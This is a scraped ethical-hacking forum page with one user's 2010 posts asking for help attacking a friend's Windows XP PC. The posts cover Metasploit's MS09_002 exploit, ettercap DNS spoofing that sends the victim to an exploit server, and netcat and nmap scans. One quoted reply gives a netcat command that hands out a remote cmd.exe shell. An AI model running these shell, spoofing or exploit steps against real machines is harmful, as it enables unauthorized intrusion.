Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 25 guests and 1 member online
 
Advertisement

You are here: Home
EH-Net
May 25, 2013, 05:28:57 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
  Home Help Calendar Login Register  
  Show Posts
Pages: 1 2 [3] 4 5 ... 9
31  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / MS09_002 memory corruption exploit help !@! on: June 01, 2010, 10:39:05 AM
I've started my first pentest Lab Smiley successfuly and thanks to all friends here that helped me alot to do that and i started my first pentest process

i tried to exploit my windows xp sp3 machine with the MS09_002_memory_corruption exploit with BackTrack 4

and when the target tried to open the browser IE6 not IE7 i got this at the Metasploit shell :

Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.2:1074 ...


is that because im using IE6 not IE7 i thought i can use this exploit at both of them !!

??


and one more thing what exploit was i talking about in this video :

http://www.youtube.com/watch?v=lhIk5Cix3DU

that guy demonstrated way to force the victim to go to his exploit server that he made with metasploit

and i tried ti this since its aweosme way to not send the victim any link or anything to ur server

i tried to do this with ettercap i edited the etter.dns and :

added the A record as the following

*            A    192.168.1.4

and then used the exploit in metasploit

the problem is when i used this exploit and if i didn't configure the options "URIPATH" it takes random path that i have to send to victim

so the new path will be for example http://192.168.1.4/gegwsgf

and the ettercap will redirect the traffic to 192.168.1.4 only without /gegwsgf

and when i tried it the victim spoofed successfuly to my ip 192.168.1.4 but no connection established at the metasploit :S why ?

that guy on the video didn't type URIPATH and didn't get random path like i did 192.168.1.4 only without the 192.168.1.4:80/fedfwgvsw

why ?



32  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 26, 2010, 12:16:08 PM
You'll need to do CCNA security before you can sit for CCSP exam.

From the Cisco website

Quote
Cisco Certified Security Professional Prerequisite
CCNA Security OR CCNA + SND* OR any CCIE Certification can act as a pre-requisite.
*Last day for using this pre-requisite is November 17, 2011.

http://www.cisco.com/web/learning/le3/le2/le37/le54/learning_certification_type_home.html


what if u took CCNA certificate exam ,, can that makes me take the CCSP ?

or should i take CCNA + SND ?

but i think now that i can't take CCSP be4 CCNA security so i should take CCNA security first right ??
33  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 26, 2010, 06:08:03 AM
Here's the client-side exploit class videos from pentest.cryptocity.net http://pentest.cryptocity.net/client-sides/

Also watch this video. It goes step-by-step how to exploit IE
http://www.youtube.com/watch?v=rN0sgw6KT4k&feature=related

Read this SANS tutorial
http://www.sans.org/top-cyber-security-risks/tutorial.php

Go over this tutorial by Chris Gates
http://www.ethicalhacker.net/content/view/219/24/

thanks alot for the links : and i want to ask personal Question if u dont or others mind

im taking CCNA course and im about to finish it and im asking

i want to go for security field and i wanted to take CCNA security course

but i see that CCSP more detailed course about CCNA security

so if i take CCSP i wont need CCNA security ??

or should i take CCNA security be4 i take CCSP ??

please if u can answer advice me so i wont take needless course

thansk in advance all of you Smiley
34  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 24, 2010, 09:45:32 PM
Quote
So this is a company network? Do you have proper permission to perform such kind of tests on this network? And by permission I mean permission not from the LAN admin to hack his computer, but from someone superior, otherwise you're just calling for unnecessary trouble. We want to hep you and don't want you to get into any legal issues.

no no i will make it more clear ...look here some people get public IP from ISP and DSL service okay ? for speed lets say 2 mbps and those people buy this speed not for personal usage .. but for make money by sharing this speed on others by making his own LAN Router switches etc anc connect many people in his zone with some cash per month for sure
and that guy im part of his LAN and im his friend and its no worry at all with pentests on his LAN and i only do this on his pc under his permission i can't do this on other members because i dont like to mess with others inocents people Smiley


Quote
That's why I asked you to get some good books. Also. rather than just focusing on hacking methods ask other members about courses and certificates which will help you to get into infosec.
ya im downloading more books already for this to know as much as possible info Smiley


about the client-side exploits what for example i knew he using firefox or Google Chrome .. can u point me to some links or videos talking about different client-side browsers exploits ?
35  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 24, 2010, 12:04:15 PM
i think friend you missunderstood me on some thing :

Quote
Funny,because what I and many others have told you till now was thinking that you both are on different LANs.

how that possible ,, since im scannign 10.0.0.3 if u saw my nc scanning that u told me to do Smiley its local ip not public right !! ?

Quote
In this thread http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5376.15/ when you said you couldn't get the reverse shell and asked for the I.P for LHOST etc. were you still on the same LAN or on a different network? In the former case I'll have to re-post to some of your questions.

on that thread when i asked about client-side attack and cant' get to work and asked for LHOST ip that was other friend at remote network thats why i asked should i put my internal ip or external and other friend in the forum explained to me that i should put the external ip so the reverse traffic can go to my WAN ip and then my router pass that traffic to my internal ip (LAN) since i forward port in the router to my ip right !!!! ?


Quote
at this one

Even in this thread when I asked you "what device are you scanning?" I thought that there's a router between you two when in fact you can directly scan him.
at this part in the beginning i didn't figure out by saying "what device are you scanning" and i told you after i understand what ya trying to say that its PC

Quote
Also, what kind of network is this? Some office network? Kindly answer this.
its normal network with many users inside
 
Quote
What client-side attack mean that you firstly enumerate vulnerable application on the victim's computer.

at this part i dont know how to enumerate vulnerable application at remote host :S ....or you mean service scanning for application ?

Quote
don't just rely on the forum posts. If you truly want to learn then you've to make that effort.
i dont rely on forum only dude dont forget that pentesting world is so huge and collecting as much info as u can is hard from only good right ?
i'v been many years trying to ..


Quote
Furthermore, in you earlier thread you posted that you've problems making a reverse connection via netcat. Were you on the same or different networks when you were trying to make the connection?

no at this one we were at different network

Quote
If you were on the same network then you don't have to use router's external I.P address or forward any port. You just have to use your local LAN I.P.
ya i know that one Smiley thanks for extra info

Quote
So if both you and your friend are on 10.0.0.0 network. Your I.P is 10.0.0.167 and your friend's I.P is 10.0.0.69 then use the following commands:

On your computer
Code:
nc -l -p <80 or any other port>

On your friend's computer
Code:
nc 10.0.0.167 <80 or any other port you've opened> -e cmd.exe

i wasn't talking about this as same LAN i know this one i was talking about Remote network Smiley but thanks for helping and  additional tip

Quote
Also, there's a limit to what you can learn on the forums
what do u mean ?

Quote
earlier thread, improve your networking concepts, practice in your virtual lab and post any issues that arise. We'll try our best to help you out.
thanks alot being such a Gentel
36  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 24, 2010, 08:31:39 AM
rebov, there are a number of vulnerabilities you can use in client-side attacks in most popular software, include MS Office and Acrobat.  You can also go for phishing or other similar techniques. 

I would still research SNMP and TFTP based attacks.  While they may not result in outright compromise, they can yield some juicy information. 

ok thanks alot i want to ask : should the victim has acrobat reader installed on his system in first place to infect him with the Malicious file or even he is not installed it he will be infected too ?
37  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 24, 2010, 06:30:18 AM
hi guys,

my apologies for interrupting this (amazingly good and educating) discussion but, rebrov, are you authorized to perform these actions against this machine?

cos otherwise, I can't understand why this discussion is allowed and hosted in the EH-Net...

no offense to anybody, I don't mean to indicate to anyone how to moderate of course. I just have seen no indications so far that these actions are taking place during a black/gray/white box pen testing process...




as i said be4 and i bet you didn't see it : that that guy is my friend and he is the Lan owner and if you checked my old old threads u will find that i were trying to do the same that im doing lan Learning at his Lan and now im trying to be part of pentest so far on his pc and yes its under his permisson

is that okay with you ?
38  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 24, 2010, 06:25:30 AM
Quote
Do you want to say that you both are on the same network and therefore connecting to the internet via the same router?

yes thats Right he is the Lan owner and im part of it and im testing his own pc

and yes we are connecting at the same router
39  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 24, 2010, 06:22:25 AM
It looks like your friend's PC is behind the router.  It also doesn't appear to be forwarding any services to the Internet.  So you have a couple of choices here.   You can attack the router itself and get it to forward some services from the PC.  You can also use a client-side attack, such a PDF file payload via email.  

WoW you read my mind Ketchup yes i think too that i have to go around client-side attack but anyway i will not hack hack him i just want to learn for educational purposes and this thread i learnt alot Smiley and thanks to you guys

but Question : can i do client-side attack with any other extension than .pdf ??
40  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 23, 2010, 01:50:01 PM
Rebov, think about what routers do with TFTP and SNMP protocols.   There are a number of attacks against these protocols.   With some earlier version of Cisco routers, SNMP was very deadly. 

but what that to do with my friend pc ? you talking about router

but as u said that opened ports at router is alot but can't exploit them :S:S

port 53 dns is 1 of them UDP port
41  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 23, 2010, 10:19:54 AM

Quote
Hmmmm.. so you want to say that your friend is not using the Mikrotik router and is DIRECTLY connected to the internet?


no he is connecting to internet via Mikrotik router we are at the same lan Smiley

he is the Lan Admin he is the owner Smiley its Mikrotik server what he made

whats on ur mind Smiley ?
42  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: how to penetrate pc through NAT ?? on: May 23, 2010, 08:37:30 AM
The friends computer is behind a router over which he is not having direct access (I presume). However, think about the status of his router status after all these "confused port-forwarding"  Wink


ooh no when i said i tried this and test it on my friend pc my friend let me do this he accepted the nc on chatting easy and opened it he even typed the command i told him to

but to make port forward i can't since the router is mine to open thats why i can't make it work dun have access to the router that im associated to Cheesy
43  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 23, 2010, 08:30:40 AM
Quote
You are using wrong syntax. Look carefully, the correct syntax is:

Code:
nc -n[b]z[/b]vu 10.0.0.3 69

oh yes sorry about this i thought its S not Z at the command nzvu i typed nsvu Smiley

anyway thats only what i got :
nc -nzvu 10.0.0.3 69
(UNKNOWN) [10.0.0.3] 69 (?) open


Quote
I meant are you scanning his computer or some device between you and his computer?

yes yes i got it now yes its a computer not router or anything else Smiley its PC



sorry one more thing forgot to say :

i used wireshark to check the ports that u said with no success to get any traffic between

ip.addr == 10.0.0.3 && udp.port == 69
ip.addr == 10.0.0.3 && udp.port == 161
ip.addr == 10.0.0.3 && udp.port == 162
44  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 22, 2010, 07:15:16 PM
Quote
For Netcat
Code:
nc -nzvu <Remote I.P> 69
nc -nzvu <Remote I.P> 161-162

for this one couldn't get anything because i got this error :

Code:
nc -nsvu 10.0.0.3 69
Can't parse vu as an IP address

Quote
Now compare it with
Code:
nmap -sU <Remote I.P> -p 69,161,162

with Nmap i got this :

Code:
Starting Nmap 5.00 ( http://nmap.org )
Interesting ports on 10.0.0.3:
PORT    STATE         SERVICE
69/udp  open|filtered tftp
161/udp open|filtered snmp
162/udp open|filtered snmptrap


Quote
What do you see? Match the sniffer outputs for both netcat and nmap and check what Netcat is doing wrong
i think that yes Ncat got false positive results

Quote
BTW did you try connecting via telnet and ftp? You didn't report their result. This is the main thing that I wanted you to test.
yes tried and didn't get any reply so i think yes that Ncat was messing around those ports not open Smiley

Quote
Furthermore, did you get what device I'm asking you to scan?
i didn't get this one what do u mean ...what device ?
45  Ethical Hacking Discussions and Related Certifications / CEH - Certified Ethical Hacker / Re: Metasploit - Win XP sp3 - port 445 exploit !! and Meta bug on: May 21, 2010, 05:55:48 PM
Lesson Time: You've to understand that as much as you want it, not every system is hackable. Sometimes, no matter what you do, you just can't hack it. It could be completely patched, it might have strong passwords etc.

However,there are scores of methods to get into a system, you are limiting yourself to only one. Be creative. If you can't enter through 139, 445 there must be some other ways..

Try the following commands. I'm sure there's a surprise awaiting you Wink

Code:
nc -v <remote I.P>  23
            or
telnet <remote I.P>

Code:
nc -v <remote I.P>  21
            or
ftp <remote I.P>


Code:
nc -v <remote I.P>  80
            or
telnet <remote I.P> 80

Code:
nc -u -v <remote I.P>  69

Code:
nc -u -v <remote I.P>  161

Code:
nc -u -v <remote I.P>  162

For each of these commands try to understand what's happening and why is it behaving like this and report back.


and Surprises has been shown up Smiley

i have to say u r great teacher Smiley u were trying to do some UDP scan at specific ports

i tried already to this with Nmap btw after u told me with no use but when i tried nc i got this :


nc -u -v 10.0.0.3 69
10.0.0.3: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [10.0.0.3] 69 (tftp) open

nc -u -v 10.0.0.3 161
10.0.0.3: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [10.0.0.3] 161 (snmp) open

nc -u -v 10.0.0.3 162
10.0.0.3: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [10.0.0.3] 162 (snmptrap) open


then tftp , snmp & snmptrap is opend up .. i expect from u to say that next step is exploit them however i didn't get what service exactly running right ?

so i think i should make intensive scan on this ports but to get service

it might be snmp enumeration what do u think Smiley ?
Pages: 1 2 [3] 4 5 ... 9
Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.598 seconds with 21 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.